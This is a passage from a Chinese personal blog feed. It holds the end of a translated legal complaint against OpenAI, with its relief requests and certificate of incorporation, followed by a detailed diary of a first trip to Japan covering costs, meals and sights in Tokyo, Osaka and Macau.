Inc.的慈善捐赠以及这些资金资助的知识产权和衍生作品使用情况的财务信息，原告目前无法确定他对资产的使用、分配或分发的权益，除非进行账目审计。因此，原告有权要求进行账目审计。</p></li></ol><h1 id="请求救济"><a href="#请求救济" class="headerlink" title="请求救济"></a>请求救济</h1><p>因此，原告请求法院对被告作出以下判决：<br>A. 发出命令，强制被告执行其多次作出的合同承诺，具体包括但不限于：<br>   i. 发出命令，要求被告继续遵守OpenAI长期的做法，即将在OpenAI开发的人工智能研究和技术公开给大众，<br>   ii. 发出命令，禁止被告利用OpenAI, Inc.或其资产，为任何个别被告、微软或任何其他特定个人或实体谋取财务利益；<br>B. 作出司法判定，认定GPT-4构成人工通用智能（AGI），因此超出了OpenAI授予微软的许可范围；<br>C. 作出司法判定，认定Q*和&#x2F;或OpenAI正在开发的其他下一代大型语言模型构成人工通用智能（AGI），并且超出了OpenAI授予微软的许可范围；<br>D. 颁发与上述A至C项相一致且为实现这些目标的禁令性救济；<br>E. 要求返还和&#x2F;或没收被告在从事本文所述不公平和不适当行为期间收到的所有款项，加上预判利息和罚金，根据《商业与职业法典》第17200条及其后续条文；<br>F. 对原告和其他人向OpenAI, Inc.捐赠的资金，以及由这些资金资助的知识产权或衍生作品，以及被告将其用于个人利益或任何个人或第三方实体的利益的使用情况，进行账目审计；<br>G. 要求赔偿一般的、补偿性的和惩罚性的损害，具体金额将在审判中确定，原告将把获得的每一笔赔偿捐赠给非营利组织或慈善机构；<br>H. 根据《加利福尼亚民事诉讼法典》第1021.5条，要求支付律师费；<br>I. 要求判决前和判决后的利息，按照最高法定利率计算；<br>J. 要求法院认为公正和恰当的其他及进一步的救济。</p><h1 id="要求陪审团审判"><a href="#要求陪审团审判" class="headerlink" title="要求陪审团审判"></a>要求陪审团审判</h1><p>原告在此要求对所有适宜由陪审团审理的问题、索赔和&#x2F;或诉因进行陪审团审判。</p><h1 id="附件"><a href="#附件" class="headerlink" title="附件"></a>附件</h1><p>非股份公司成立证书<br>OPENAI, INC.</p><p>首先：公司定名为“OpenAI, Inc.”（以下简称“公司”）。</p><p>其次：公司在特拉华州的注册办公地址位于特拉华州新城堡县威尔明顿市Centerville路2711号，套房400。其注册代理为公司服务公司。</p><p>第三：本公司将作为一家专门从事慈善和&#x2F;或教育目的的非营利性公司而成立，这一点符合经修订的1986年内部收入法典第501(c)(3)条款或任何未来美国内部收入法的相应规定。本公司的具体宗旨在于为人工智能相关的技术研究、开发及传播提供资金支持。所开发的技术将造福公众，且在适用情况下，公司将致力于将技术开源，以便公众受益。公司成立的目的不是为了任何个人的私利。为了实现这些目的，公司将从事任何根据特拉华州通用公司法可由非营利公司进行的合法行为或活动。</p><p>第四：本公司仅为本文第三条所列目的组织和运作，这符合内部收入法典第501(c)(3)节的规定。本公司的主要活动不得包括进行宣传或以其他方式尝试影响立法，且本公司不得参与或介入任何政治活动（包括发布或分发声明）以支持任何公职候选人。在这些条款的任何其他规定中，公司不得进行任何不被允许的活动，即 (a) 根据内部收入法典第501(c)(3)节免税的公司&#x2F;组织不得进行的活动，或任何未来联邦税法的相应节，以及 (b) 根据内部收入法典第170(c)(2)节的捐赠可扣除的公司&#x2F;组织不得进行的活动，或任何未来联邦税法的相应节。</p><p>第五：本公司的财产专门用于实现本文第三条所述目的，且在任何情况下，本公司的净收入或资产均不得用于任何董事、官员或成员的个人利益，或任何私人之利。在本公司解散或终止运营时，扣除或预留足够支付所有债务和责任后的剩余资产，将分配给一家专门从事慈善、教育和&#x2F;或宗教目的的非营利基金、基金会或公司，该组织必须已根据内部收入法典第501(c)(3)节或任何未来联邦税法的相应节确立其免税地位，或者将其分配给联邦政府、州政府或地方政府，用于公共目的。</p><p>第六：公司不设有任何资本股份。</p><p>第七：公司不设有任何成员。</p><p>第八：设立人的姓名及邮寄地址如下：<br>Jonathan Levy<br>335 Pioneer Way<br>Mountain View, CA 94041<br>我，Jonathan Levy，为了根据特拉华州法律成立一家公司，特此制作、提交并记录此证书，并证明此处陈述的事实属实。据此，我在此签名。<br>执行日期：2015年12月8日。<br>授权官员：Jonathan Levy</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;我认为这是一篇有价值的法律文书，因此使用了机翻+人工校对，有误之处欢迎指出，还请多多包含。&lt;/p&gt;</summary>
    
    
    
    <category term="翻译" scheme="http://example.com/categories/%E7%BF%BB%E8%AF%91/"/>
    
    
    <category term="翻译" scheme="http://example.com/tags/%E7%BF%BB%E8%AF%91/"/>
    
  </entry>
  
  <entry>
    <title>第一次日本之行</title>
    <link href="http://example.com/2024/01/29/%E7%AC%AC%E4%B8%80%E6%AC%A1%E6%97%A5%E6%9C%AC%E4%B9%8B%E8%A1%8C/"/>
    <id>http://example.com/2024/01/29/%E7%AC%AC%E4%B8%80%E6%AC%A1%E6%97%A5%E6%9C%AC%E4%B9%8B%E8%A1%8C/</id>
    <published>2024-01-28T16:00:00.000Z</published>
    <updated>2024-01-31T08:04:07.179Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/japan_1.jpg" alt="Japan"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>日本之行结束了，嗖~如一阵烟便消失了。</p><h1 id="我的心情"><a href="#我的心情" class="headerlink" title="我的心情"></a>我的心情</h1><p>在出发前，原以为自己会在日本心情比较激动，毕竟久违地出国旅游还是自己看动漫比较多的日本，但实际没有。一小部分原因是我的脚每天都在痛（走多了），更大的原因是我的心波动越来越小了。能感受到自己对于活着的喜悦很少呢，但我想努力改变这种状况。尽管很多时候努力了还是不尽如人意。<br>不过我的心情还是比较愉快的。</p><h1 id="日本的消费"><a href="#日本的消费" class="headerlink" title="日本的消费"></a>日本的消费</h1><p><strong>去日本之前的准备花费</strong><br>护照：120元<br>日本签证：262+14(寄送资料)元<br>流量卡34元</p><p>人民币和日元汇率0.0486差不多。<br><strong>机票</strong><br>不算贵，感觉和飞国内差不多。2000人民币以内能买到往返机票。<br><strong>住宿</strong><br>游客的住宿，如果是酒店的话价格会比较高，通常400-500只能住房间面积很小的双人床，但是如果住民宿就很舒服了，通常300人民币就能住到宽敞的双人床房间，平均每人甚至都花不到180人民币一晚。与国内对比可以说完全不贵了。澳门住一晚没有500别想。<br><strong>用餐</strong><br>大致要分两种，一种是在餐厅消费，一种是在麦当劳便利店消费。<br>餐厅消费的话，东京普遍价格在40-300人民币之间。最便宜能吃饱的通常就是拉面店这一类餐厅，比较贵的就是烤肉了，想吃得畅快往往在500人民币左右（本次未吃太贵了）。<br>麦当劳便利店消费的话，通常就是预制菜一类。全国价格比较统一，一般在20-50人民币之间。<br>举例麦当劳的 汉堡+薯条+可乐 三件套在27-43人民币之间。对比一下国内的话其实价格差不多，当然如果国内在淘宝等地方买是会便宜一半左右。<br>不过如果按麦当劳app或小程序点餐，想想日本比国内高那么多的人工费最后价格却相差无几，那其实说明国内的利润不少。澳门麦当劳比日本还贵。<br>餐厅吃这一块儿，体感日本比国内二线城市贵了2.5-3倍，比国内一线城市贵了1-1.5倍<br>另外还得补充一点小吃，不同小吃价格还是相差蛮大的，比如草莓大福20元一个，和果子17元一个。又像章鱼烧，平均每个不到2元，也挺好吃的。还有可丽饼、冰淇淋一个20元左右。便利店的面包一个5-10元。<br><strong>饮料</strong><br>其实日本很多地方可以免费喝水，大部分时候看不到日本人会拿着塑料瓶。不过日本的纯净水大多是在5-8元之间，可口可乐500ML的有6块一罐也有9块一瓶。饮料价格普遍是国内的3倍左右。<br><strong>交通</strong><br>日本人用的最多的是地铁，一般来说坐一次8-20元，如果是从市区到机场之类的地方大概需要50-100元。公交车的价格差不多12元，如果是从东京市区到富士山河口湖要120元左右。出租车此次日本之行也没坐，听说200日元每公里。总的来说交通价格应该是国内的4倍。<br><strong>水果蔬菜肉类</strong><br>此次日本之行没有买，总的来说是比国内的贵一些，但有些东西的价格也没贵到离谱。和国内二线城市相比平均贵了2倍左右吧，水果要更贵一些。如果在日本生活自己做菜吃每顿成本应该不超过25元吧。<br><strong>演出</strong><br>在日本看各种展览，演出或演唱会等，价格一般在50-500元之间吧，感觉和国内没有差别多大(黄牛加价因素不考虑在内)。<br><strong>其它</strong><br>看到的按摩150元30min，感觉还不算贵(相较于东京一小时人工费最低55元而言)。</p><h1 id="去的日本景点与美食"><a href="#去的日本景点与美食" class="headerlink" title="去的日本景点与美食"></a>去的日本景点与美食</h1><p>这里记载的是本次日本之行去过的日本景点与美食。</p><h2 id="成都飞澳门"><a href="#成都飞澳门" class="headerlink" title="成都飞澳门"></a>成都飞澳门</h2><p>迟到比较普遍，本次是迟到了20min左右，看了以往数据也有迟到。<br>在这趟航班上空姐们穿的红色制服，使用语言主要为中文和英语。飞机起飞半小时后陆续开始飞机餐，顺便会发一瓶300ml的瓶装水。<br>飞机餐是两种选择，面或饭。<br>第一次我选择了面，味道还算将就。但是非常少，几下就吃完了，另外会发放一个面包和水果。<br>入境澳门海关时因为之前记得中转不需要澳门通行证，也就没办，去到窗口说明情况后，发了一张小纸，证明可以在澳门滞留7天。不过实际上没有任何人会看这个。</p><h2 id="澳门"><a href="#澳门" class="headerlink" title="澳门"></a>澳门</h2><p>澳门之旅毫无疑问是不愉快的。<br>机场暂存行李需要80人民币，对于我们刚下飞机还是大陆物价的人来说有点难以接受，毕竟我认为在大陆这个价格都可以找家旅馆住一晚了。<br>出机场的人几乎没有步行的。而我们选择了步行。<br>澳门天气即使在冬天也平均有20度左右，来澳门时未考虑到天气因素穿得太厚了，只得在路上偷偷摸摸脱了2件衣服。<br>走过了一片片没人的地方，终于能看到有人生活的气息了，但同伴想去的是海的另一边，我便只得跟着托着行李箱爬坡。<br>走了一会儿感觉渴了，正巧发现一瓶自动售卖机，买了一瓶可乐，6.25人民币（比日本可乐还贵）。<br>千辛万苦走到大桥，发现禁止行人通行。本想着退而求其次，至少坐出租车过去吧，发现又注册不了打车程序，小红书上又写出租车不接受微信支付宝。最终只得折返，先去了一家麦当劳吃晚餐。板烧鸡腿堡套餐42人民币。<br>同伴听信小红书的话跑去一个娱乐场存行李，没有成功。跑到一个所谓热闹的地方结果基本没人。<br>最终拖着行李四处逛，走了那么久发现几乎没人像我们一样，格格不入。<br>澳门的人使用三种语言，英语，葡萄牙语和澳门语。四处流浪，走到一个商场里，发现了一个娱乐场，本想进去瞅瞅，却被保安拦了下来。大概是我们拖着行李吧。最终我们在一个公园里待着，我不想考虑那么多，睡在椅子上，睡了一两小时被风吹得冷醒了。这时我才明白无家可归的人是种什么感受。</p><h2 id="澳门飞东京"><a href="#澳门飞东京" class="headerlink" title="澳门飞东京"></a>澳门飞东京</h2><p>和上一次相差不大，不过这次的飞机餐我选择了饭。因为是飞往日本的航班，所以在饭上面比较日式。但是很难吃。<br>中国人的数量比较多，也有回国的日本人。<br>下飞机后到了日本海关，需要填一个Visit Japan的黄色单子信息(有中文)，关键信息填好即可，其它不知道的比如房东号码随便填，不会仔细看。<br>拿取行李后，还需要填一个黄色的单子(有中文)。也是和之前填的按相同做法，最后到检查口会需要检查护照。如果会日语就能很轻松通过。</p><h2 id="麦当劳"><a href="#麦当劳" class="headerlink" title="麦当劳"></a>麦当劳</h2><p>麦当劳巨无霸套餐780日元。足够吃饱了，味道不算差。唯一有一点是薯条默认没有任何调味料，没有番茄酱呢。</p><h2 id="六本木新城-amp-东京塔"><a href="#六本木新城-amp-东京塔" class="headerlink" title="六本木新城&amp;东京塔"></a>六本木新城&amp;东京塔</h2><p>到六本木新城的时候已经接近晚上10点了，所以也几乎打烊。于是楼虽高终也未登高。我们沿着路往东京塔的方向靠近，夜晚的东京塔也算是一道美景。沿途拍了几张作为记录。<br><img src="/images/Japan_2.jpg" alt="东京塔"></p><h2 id="天妇罗"><a href="#天妇罗" class="headerlink" title="天妇罗"></a>天妇罗</h2><p>天吉屋 新宿店<br>点了店里1650日元的天妇罗招牌套餐，很美味。而且不会感觉腻。米饭虽然只有一小桶，但能看到晶莹剔透，绝不是拿的次等米。<br><img src="/images/Japan_13.jpg" alt="天妇罗"></p><h2 id="明治神宫"><a href="#明治神宫" class="headerlink" title="明治神宫"></a>明治神宫</h2><p>跟着Google Maps的导航走，进了后门，人很稀少，周围有许多百年大树，跟着前面2个日本人不一会儿走到了神宫内，顿时就热闹非凡了。有各个地区的学生练的巨大书法在墙上贴着。有500日元祈福的“绘马”，有人在丢硬币做参拜。因为我们是从出口走到入口，所以看的景色也和大多数人有所区别，像是入门的洗手洗嘴，有些日本人在大门前会有拜的动作。回程时看到一些小学生穿短裤光着腿不禁感叹他们的抗寒能力。<br>出门吃了个冰淇淋，英文名是Special Green Tea，听说是京都特产，500日元一个。味道还不错。</p><h2 id="新宿"><a href="#新宿" class="headerlink" title="新宿"></a>新宿</h2><p>因为出明治神宫时还比较早，步行到新宿继续逛。路上能感觉到空气的清新，吸烟的人只能在吸烟区，东京这样的大城市还是比较守规范的。走日本的小巷其实没什么人，但也很干净。<br>步行了大约50分钟，到了歌舞伎町。此时就能看到很多“无料案内”了，还有很多官方的警示牌，大意是禁止强制拉客吧。逛了2小时左右，给人的氛围还是不错的，歌舞伎町蛮热闹的。</p><h2 id="涉谷"><a href="#涉谷" class="headerlink" title="涉谷"></a>涉谷</h2><p>涉谷一下车站，就能走到十字路口，每次红灯过后都有数百人经过，很多人拿着相机拍摄。不过我没留下一张照片。逛涉谷就没看到新宿那种风俗店了，取而代之的是一些按摩店。人潮汹涌，到了9点后也不再火热。</p><h2 id="拉面"><a href="#拉面" class="headerlink" title="拉面"></a>拉面</h2><p>吃的拉面，由于是游客想尝尝最好的是什么样的，于是点了偏贵的1100日元的拉面。在店门口发现了自动售卖拉面券的机器，我们正在选时拉面店老板出门查看我们人数，等我们买好后进门已经有冰水摆在桌上了。于是老板开始询问面的详细配置，诸如量的多少，硬度，pork还是chicken等。由于日式英语有点没反应过来，选的时候有点懵就结束了。<br>由于进门时我们是第一组客人，不一会儿拉面就上桌了。拉面分了2个碗，其一装拉面，其二装底料。等上齐之后，我和同伴发现，明明点的是同一个，但由于配置不同，看起来相差还是比较大的。<br>拉面老板十分热情，有空的时候会把客人送至门口，即使没空也会说好多声“谢谢”之类的话。</p><h2 id="富士山"><a href="#富士山" class="headerlink" title="富士山"></a>富士山</h2><p>老实说，这次富士山玩得不算多好，因为诸多不熟悉的因素导致了一系列差错。尽管选的日子是大晴天，却仍有一团白云笼罩在富士山头顶。不过风景也不算太差就是了。去坐了富士山天上山缆车的下车路，花了500日元。一开始我还以为这个是至少在空中观赏20分钟的有趣项目，结果仅仅是2分钟下山的代步项目。<br>去了山中湖发现马上要到回东京市区的公交车发车时间，又一路狂奔到车站（这件事详情会单独写出来）。</p><h2 id="日式西餐厅"><a href="#日式西餐厅" class="headerlink" title="日式西餐厅"></a>日式西餐厅</h2><p>由于之前决定的2家餐厅都莫名其妙的没开门，于是我们只好临时搜索了一家高评分的日式西餐厅。和之前的餐厅老板一样都很热情，简直像是对待几年没回家的家人似的。餐厅主要就3种，但是第一种会有很多搭配，由于时间不多我们便三下五除二做出了选择。<br>于是汤，面包，意面一个个端上来了(印象中只有这3个，不知道忘了没)。味道还算不错的，老板也很热情，问我们来自哪里，不巧China她只知道北京上海。</p><h2 id="咖喱"><a href="#咖喱" class="headerlink" title="咖喱"></a>咖喱</h2><p>回到东京市区后，按计划我们马不停蹄地去了下北泽吃咖喱，在之前计划里其中一家已打烊，只得选择第二家。这一家的餐厅很小，约莫能容纳8,9人。看着不明不白的菜单，稀里糊涂的又选完了。端上来的咖喱饭，很有特色。有三种肉：鸡肉，猪肉，牛肉。另外我们还点了一小碗羊肉。加入佐料混合在一起吃，味道有些奇特，我唯一感觉可惜的是饭太少了，混合在一起时几乎感受不到饭的味道，让我口腔里只剩下各种肉类和调味料。</p><h2 id="下北泽"><a href="#下北泽" class="headerlink" title="下北泽"></a>下北泽</h2><p>来到下北泽，就是著名的孤独摇滚圣地巡礼了，不过别人大多是白天来，而我们无奈晚上才来。随便逛了逛，这里与大热门的新宿涉谷又是另一番风味。怎么说呢？它没有新宿涉谷那么热闹那么地接受外来游客，只是静静地在那里不声不响，孤独却不寂寞。</p><h2 id="筑地市场"><a href="#筑地市场" class="headerlink" title="筑地市场"></a>筑地市场</h2><p>很遗憾，没有起个大早，到了筑地时已经快到11点了，而我又正好吃了早餐，于是遇上了看着就很美味的草莓屁屁大福只能吃一个，不过价格感觉还是蛮贵的，400日元一个。完全值得的美味，草莓的香甜汁液与点心皮和点心馅儿混合一起，一瞬间一切都消失了，只剩下人间至福。<br>感觉筑地市场只有那些需要排队的才好吃，不用排队的都比较一般吧。问题在于排队的多半都要等不少时间，这是比较可惜的。<br>去吃午餐路上还发现了一个筑地本愿寺，去的人大多是为了参拜或仅仅是游客。寺庙本身还算大，但正中间都不允许进入，只有边缘可以走，这样一来就显得很小了。<br><img src="/images/Japan_5.jpg" alt="草莓屁屁大福"></p><h2 id="寿司"><a href="#寿司" class="headerlink" title="寿司"></a>寿司</h2><p>去吃了筑地旁的寿司，要登记名字，前面大约15人，等了45分钟。真久啊。进去后是站着吃的，俗称罚站hh。我点了最贵的1990日元的10贯寿司，是师傅手捏好然后一个个拿来的。酱油和芥末是一起的，当把表面的酱油蘸完，底部就是芥末了。能感受到那些鱼的晶莹剔透以及咬下去的那种入口即化的感受。简直令人欲罢不能。只吃了10贯没一会儿就出来了。当时以为吃饱了，其实可能只是站着造成的错觉吧，下午很快就饿了。</p><h2 id="teamLab-Planets"><a href="#teamLab-Planets" class="headerlink" title="teamLab Planets"></a>teamLab Planets</h2><p>下午去看了这个展，我不知道这个展是哪个国家的人做的，好像只在亚洲这边有，但是又好像工作人员大多西方人或说英语。令我摸不着头脑，但是挺不错的。<br>展览总共有6个：</p><ol><li>五彩晶莹垂落的光条与四面八方的反射镜，仿若是置身于梦幻之境。</li><li>浮现于水域的鲤鱼四处游动，彩色漩涡令人惊叹。</li><li>巨大气球，随时间不断改变颜色</li><li>好像是在旋转的巨大轮盘，天幕上是投影的四处飘散的花朵。我们在这儿躺了足足半小时有余。</li><li>巨大的银色蛋形物质，好像是要晚上才会显现光芒。</li><li>数十种花朵一齐展现在面前，能闻到淡淡的花香。</li></ol><h2 id="银座"><a href="#银座" class="headerlink" title="银座"></a>银座</h2><p>购物之地，下午来的时候感觉人不算多。这里又是另一种气息，仿佛是一位高贵而冷艳的矜持女子，很难说在这儿感受到多么的热情，透露出的是一股冷冷的气息。</p><h2 id="猪排饭"><a href="#猪排饭" class="headerlink" title="猪排饭"></a>猪排饭</h2><p>选择了一家猪排饭，不错的评价让人选择了它。来的时候刚刚好开门，来的人仿佛都是常客了，清一色点的1650日元的猪排饭，而我们点的1950日元(因为旅游想尝尝最好的什么样)。结果发现其中的区别就是有无咖喱。早知道还不如点普通猪排饭。<br>桌上有五六种酱，我想每种都轮流加，这样吃起来不会感觉单调。</p><h2 id="浅草rocksta表演"><a href="#浅草rocksta表演" class="headerlink" title="浅草rocksta表演"></a>浅草rocksta表演</h2><p>来浅草时街上的店大多关门了，由于需要等待最后一场演出，先在外面超市买了一点纪念品。<br>终于等到了，我们每人花了4000日元观看演出，现场不准使用手机，被俩老头严厉地说了。坐第二排观看演出。<br>表演流程大致是：先在场上一起做常规表演，然后一个人走到T台的前端开始褪去身上服装摆出各种姿势，底部的圆盘会自动转圈。<br>一共有7场。第4场的女生很有活力，令人比较有印象。还有一位在最开始热身表演就担任主角的乖巧女生让我比较喜欢。其它就比较单调了，我一开始期待的是那种犹抱琵琶半遮面的羞涩感，但看来并没有如此。<br>来的人把座位都占满了，还有不少站着观赏的。有不少外国人，也有不少女生。<br><img src="/images/Japan_7.jpg" alt="主演们"></p><h2 id="汉堡肉和布丁"><a href="#汉堡肉和布丁" class="headerlink" title="汉堡肉和布丁"></a>汉堡肉和布丁</h2><p>就近原则，选了一家看起来评分还不错的。主打蛋包饭。<br>进门后，是一间安静的吧台样式的餐厅。桌上已摆好了菜单，我看着上面是英文，下面是日文。估摸着下面也看不懂直接看上面，然后我把它理解成了套餐。点完后自以为点了很多，结果只是一份1000日元的蛋包饭和一份1000日元的汉堡牛排+600日元的南瓜布丁。起先上的是蛋包饭我让给了邻座同伴，因为我以为我既点了蛋包饭又点了汉堡牛排。结果就是最后并没有吃到期待中的蛋包饭。</p><h2 id="浅草寺"><a href="#浅草寺" class="headerlink" title="浅草寺"></a>浅草寺</h2><p>由于之前住民宿时临时想在东京多留一天，但发现原来定下的民宿的后一天已经被人定了，于是早上先跑到新的民宿去，然后再去的浅草寺。<br>去浅草寺那天是阴雨朦胧，而我们走的路的顺序按地图直达浅草寺，所以也错过了浅草寺的雷门。走在中间的小巷里，两边都开着店铺，即使阴雨天也能看到人来人往。<br>此时发现了和果子，看起来也挺美味的样子，350日元一串，买了3串。好吃！能感受到糯米的香味与淡淡的甜味，一口咬下去便黏在了牙齿间，仿似依依不舍。<br>很快就走到浅草寺了，门前雨伞林立，进入了大门，有许多人排队参拜，左右都有卖祈福的福袋，也有著名的抽签。不过我一样都没做，毕竟我并不信这些。待了一会儿，走到雷门，雷门十分大。门前有一位身着黑色和服的女生，以羽扇掩面无言，因为我看到有穿黑衣的工作人员，而且这位女生容貌精致让人难以忘怀，所以我一时间误以为这位女生是官方请来专门让游客拍照的。尽管觉得有些奇怪，还是接受了。<br>去周围的纪念品店逛了逛，并没有看到什么有趣的东西。老实说，我觉得纪念品大多并不值得买，虽则只有在日本能买，可问题是买纪念品大多收割的不过是游客的一时兴致，买回去后能记得还能多久呢？甚至不如花瓶做装饰用。另外，如果此生只来日本一次，我觉得买纪念品倒也无可厚非，但我自己并不觉得此生只来一次，很可能以后还会来很多次，这是一块有趣的地方。基于这三个原因，我什么也没买。<br>后来再到雷门等人，才发现雷门的那位女生也不过是在等人罢了。在这之前也有很多位游客如我一般将她当作了一道风景咔咔拍照。不禁哑然失笑了。<br><img src="/images/Japan_8.jpg" alt="雷门"></p><h2 id="东京国立博物馆"><a href="#东京国立博物馆" class="headerlink" title="东京国立博物馆"></a>东京国立博物馆</h2><p>不了解的，去看只能了解；了解的，去看才叫欣赏。</p><p>1000日元的门票，2100日元是特别展，不过没买特别展，关于佛教的也不懂，还有点小贵呢。<br>进去之后，能感受到内容特别多。有两层楼，我们进门后以顺时针方向浏览。<br>到写下本文时我已经忘了很多文物的样貌了。不过左边进门处是卖纪念品的。看了一圈价格还算偏贵，也没有特别喜欢的。<br>再继续走，就是集邮的了。随便盖了几个印，老实说没感觉有什么。<br>继续走啊走，看了各种各样的文物，不过仅仅是看文物的样子也无法得知它的时代背景，又看了标注的背景介绍。便渐渐地有所感受了。<br>有很多石器时代的东西，在本身就足够古老的前提下支离破碎的，我感觉没什么拿出来展览的必要。<br>给我印象最深的是一把剑，因为看的时候剑展览的位置没有灯光，所以远远看不出什么，但当走近看时能发现漆黑的剑身上有着五彩琉璃，着实令我惊艳。可惜的是我没把它拍下来。<br>随后也看了很多各式各样的文物，诸如武士刀，铠甲，皇袍，字画，佛像等等。看到中意的有很多不允许拍照，也是可惜。<br>因为腿蛮痛的，看一会儿我就休息一会儿，可能多花了一些时间吧。</p><h2 id="鳗鱼饭"><a href="#鳗鱼饭" class="headerlink" title="鳗鱼饭"></a>鳗鱼饭</h2><p>从东京国立博物馆出门后，便发现不远处有人在表演，虽然雨淅淅沥沥在下，人也有不少，气氛还挺热闹。想着既然不花钱就去看看吧，不过走进了看发现好像都是男生假扮的女生，而且歌也不是现场唱的，于是没看多久便离开了。<br>原本是打算先回民宿把行李箱放在房间里（之前去时还没退房，东西都在外面），但走了几步路计算了一下时间发现这样太晚了，于是决定直接去秋叶原吃晚餐。<br>由于发现坐电车和走路花费时间差不多，就径直往秋叶原走了。许久之后终于抵达，鳗鱼饭是在门口用自动售票机卖的，种类无非就是特大大中小和加些配菜之类的。我选的“上”，花了1580日元。点了后直接进门，也是个小店，仅坐了十号人左右。<br>少顷鳗鱼饭便送到了，蛮好吃的，口中会有一股淡淡的海的味道。而鳗鱼本身的刺令人忽略不计。再与洁白的米饭组合一起，是能让人吃三大碗的程度。</p><h2 id="秋叶原"><a href="#秋叶原" class="headerlink" title="秋叶原"></a>秋叶原</h2><p>饭毕后，已经接近晚上八点了。体感上一半的店都关门了，只得搜寻地图四处逛逛。<br><img src="/images/Japan_10.jpg" alt="秋叶原"><br>此时还在开着的店，好多都有卖成人用品。琳琅满目迷人眼，不过感觉也就那几类吧。在狭小的通行中没怎么感受到乐趣。<br>在外面走时和网上说的一样，有很多女生站在街边，样貌和身材似乎都还不错，但我不想多看，免得她们以为我有兴趣拉着我。<br>这便是东京的最后一天逛的地点了。</p><h2 id="东京飞大阪"><a href="#东京飞大阪" class="headerlink" title="东京飞大阪"></a>东京飞大阪</h2><p>早上六点便起床，准备去成田乘8:30的飞机前往大阪。<br>去机场的车票挺贵的，大概总共花了2500日元。然后到了机场自助打印登机牌。一路前去安检，稍微惊讶的一点安检是还需要脱鞋，虽然也有人没脱鞋就去了但我还是想尽量遵守规则。<br>一切顺利，距离起飞还有20min，坐上大巴，登机时就只有10min起飞了。可谓是踩点之行。</p><h2 id="居酒屋"><a href="#居酒屋" class="headerlink" title="居酒屋"></a>居酒屋</h2><p>在大阪下飞机坐电车放行李一通操作后，终于去吃午餐了。由于很多店关门了，我们只得选择了一家居酒屋。进门后店主便问我们是否抽烟，我一开始没有意识到这有什么区别，便想往无需脱鞋的地方坐下。但店主接着示意我才明白，不脱鞋的地方是抽烟的人坐的。我们被安排在了最里侧的小桌上。菜单是在平板上，自己点。我们点了牡蛎和一个看起来是面的东西。还没点完，店员小姐便送上来了一碗肉菜，一开始以为是送的，后来核对账单时才发现是算在了账单里的，相当于变相收取座位费了。<br>菜一个个送上来了，牡蛎只有8个，是用清水煮的。店员小姐看时机便把煮好的牡蛎给打开送入碗中，这便是1100日元的菜了，感觉有点小贵。然后点的以为是面的菜送上桌了，发现并不是面，而是与白菜一起炒的什么肉。不难吃，加上我也蛮饿，便几下子吃完了。最后结账单时挺贵的，算是日本之行最贵的一顿了。</p><h2 id="章鱼烧"><a href="#章鱼烧" class="headerlink" title="章鱼烧"></a>章鱼烧</h2><p>往这边吃午餐的其中一个目的便是为了章鱼烧，因为想尝尝大阪美味的特产。<br>不过一开始是走到一家可丽饼店门前想尝尝可丽饼，但苦恼于没有坐的地方可以吃便放弃了。<br>最终走到了章鱼烧店门前，看着招牌写着“全国6790家章鱼烧里排名第3名”，也不禁让我想知道到底有多好吃了。<br>门前排着长队，等了约半小时终于轮到我了，300日元8个。买了后就往右边的公园去找座位吃。<br>味道还是挺不错的，但有个问题是必须要第一时间吃才是最佳。我走到公园还是花了些时间，结果吃的时候感觉已经像是要化掉那般松软了。</p><h2 id="通天阁"><a href="#通天阁" class="headerlink" title="通天阁"></a>通天阁</h2><p>由于耽误了不少时间，便没去住吉大社而是直接前往通天阁了。<br>通天阁看着还行，想着来日本也没登上过什么高地，便登上去了。<br>买票排队的时候没注意，不小心选了滑梯+通天阁顶层的项目。多花了700日元。<br>而滑梯处的两位工作人员十分热情，会说“你好”之类的。令我稍微有点尴尬，毕竟不是想来而是误选。<br>滑梯过程还是很短的，体感上不超1min。</p><p>去了通天阁二层，基本都是卖纪念品纪念照之类的，然后还有讲述什么筋肉人的漫画等，没有太大兴趣。<br>很快便去了四层，四层算是顶层以外最高的一层了，能看到下方街道的市井繁华。没多少犹豫，既然买了顶层票便登上了顶层。顺带一提，顶层票300日元。顶层没有加盖，周围只有铁丝网覆盖。虽有风袭来，也并不冷。拍了些照便找地方坐下了，能看到周围还有几座比通天阁更高的大楼，只可惜时间有限去不了了。</p><h2 id="便利店"><a href="#便利店" class="headerlink" title="便利店"></a>便利店</h2><p>由于吃穷了没现金，晚餐就在便利店解决了。<br>即使如此还是花了679日元。买了一瓶同伴推荐的奶，和一份大阪烧。味道不算难吃，但也完全称不上好吃。</p><h2 id="道顿堀"><a href="#道顿堀" class="headerlink" title="道顿堀"></a>道顿堀</h2><p>出门时已是10点，去了道顿堀附近转悠。周围还是蛮热闹的，先是发现了一个很大的扭蛋馆。林林总总估计有数百个，同伴有想要的东西没在这家店找到，又去了另一家店，不过我觉得肯定早就没了，因为他是在小红书上看到的，网红产品总是令人蜂拥而上。扭蛋还是蛮有趣的，也许我没关注，总觉得扭扭蛋的人并不多，大部分都是看看而已。<br>至于我自己，也实在没有发现令我感兴趣的东西。有时会觉得自己是否太苛刻了呢，或许不那么感兴趣的东西也可以抽一抽。不过最终还是什么都没抽就离开了，因为扭蛋只接受现金，不巧现金用得七七八八了。</p><p>后面走着便发现了一个著名的网红打卡地。尽管我不是那么感兴趣，还是拍了几张照。<br>但走时发现的另一处地点拍照感觉蛮不错的，便拍了下来，湖水荡漾倒映着摩天轮。<br><img src="/images/japan_1.jpg" alt="道顿堀"></p><h2 id="麦当劳-1"><a href="#麦当劳-1" class="headerlink" title="麦当劳"></a>麦当劳</h2><p>午餐在麦当劳解决了，吃的只有日本才有的月白汉堡(我不知道准确叫什么名，自己起的)。味道还不错，中间的实际上就是煎鸡蛋，不过时机恰到好处，因为鸡蛋外面和里面一样嫩，也不会感到腻味。吃完后自己收了盘子，感觉自己很有素质hhh</p><h2 id="大阪飞成都"><a href="#大阪飞成都" class="headerlink" 